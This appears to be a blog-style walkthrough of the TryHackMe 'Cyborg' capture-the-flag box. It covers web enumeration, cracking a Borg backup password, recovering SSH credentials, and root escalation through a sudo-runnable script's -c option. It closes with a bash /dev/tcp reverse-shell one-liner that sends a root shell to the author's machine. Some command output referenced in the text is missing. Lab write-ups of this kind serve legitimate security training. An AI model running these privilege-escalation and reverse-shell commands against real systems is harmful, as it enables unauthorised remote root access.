A box involving encrypted archives, source code analysis and more.
This is Cyborg from THM. It’s easy rated. I’ve been fighting Sustah but stonewalling, so let’s try this one.
SSH and HTTP only.
The front page is the Apache default page, so it’s dirsearch to the rescue:
root@kali:/opt/tryhackme/cyborg# python3 /opt/dirsearch/dirsearch.py -u http://10.10.181.14
Dirsearch finds a few things:
[21:15:00] 200 - 6KB - /admin/
[21:15:35] 301 - 310B - /etc -> http://10.10.181.14/etc/
[21:15:35] 200 - 927B - /etc/
[21:15:42] 200 - 11KB - /index.html
At ‘admin’ we find a personal page/portfolio thing, with a few links most of which don’t do anything. However the link for Archive > Download is real and points at:
This extracts to a directory containing a bunch of stuff including a file called README which helpfully says:
This is a Borg Backup repository.
Never heard of it before. What is it?
BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.
Okey dokey; let’s install it:
Since I don’t know how to use it, better read the docs. With this we can see how to list the repo:
And we can also see how to mount it to a directory:
However, in order to do this we do need a password. Fortunately we have one that we found in the /etc web directory. It’s hashed, but John deals with it and we are in.
Once we’ve mounted the backup we can look around and find some credentials for our user.
Once we SSH in as Alex, we find out what he can do:
What does all that mean? We’ve got a script that we can run as root, and inside this block:
We have the ability to pass optional commands to the script with the -c switch; this is our privesc.
alex@ubuntu:/etc/mp3backups$ sudo -u root /etc/mp3backups/backup.sh -c id
Produces the normal output of the script along with:
uid=0(root) gid=0(root) groups=0(root)
Cool. So now let’s do this:
alex@ubuntu:/etc/mp3backups$ sudo -u root /etc/mp3backups/backup.sh -c /bin/bash
And I get a root shell, but no output for some reason:
Well, that’s annoying. Let’s see if I can send myself a root shell then:
root@ubuntu:/root# bash -i >& /dev/tcp/10.9.10.123/1234 0>&1
That’s a yes. Thanks for playing, and back to Sustah.